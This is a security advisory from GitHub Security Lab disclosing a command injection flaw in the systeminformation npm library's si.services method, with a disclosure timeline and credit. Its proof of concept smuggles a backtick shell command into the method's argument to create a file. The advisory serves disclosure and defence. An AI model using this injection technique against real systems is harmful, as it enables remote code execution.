Coordinated Disclosure Timeline
- 2020-05-19: Emailed report to hildebrandt@plus-innovations.com
- 2020-05-19: Acknowledged by Sebastian Hildebrandt (hildebrandt@plus-innovations.com)
- 2020-05-19: Fix commit
- 2020-06-15: Emailed Sebastian Hildebrandt (hildebrandt@plus-innovations.com) to ask if he can create a security advisory.
- 2020-06-15: Sebastian Hildebrandt says he has now done the security advisory. It isn’t public yet though.
Summary
The si.services method has a command injection vulnerability. Clients of the systeminformation library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Product
systeminformation
Tested Version
Commit 1fd784f
Details
Issue 1: Command injection in si.services
The following proof-of-concept illustrates the vulnerability. First install systeminformation:
npm install systeminformation
Now create a file with the following contents:
const si = require('systeminformation');
si.services("foo,`echo>exploit`", function() {
console.log(arguments);
});
and run it:
node test.js
Notice that a file named exploit has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples:
- CVE-2020-7646,
- CVE-2020-7614,
- CVE-2020-7597,
- CVE-2019-10778,
- CVE-2019-10776,
- CVE-2018-16462,
- CVE-2018-16461,
- CVE-2018-16460,
- CVE-2018-13797,
- CVE-2018-3786,
- CVE-2018-3772,
- CVE-2018-3746,
- CVE-2017-16100,
- CVE-2017-16042.
We have written a CodeQL query, which automatically detects this vulnerability.
Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
Credit
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include GHSL-2020-112 in any communication regarding this issue.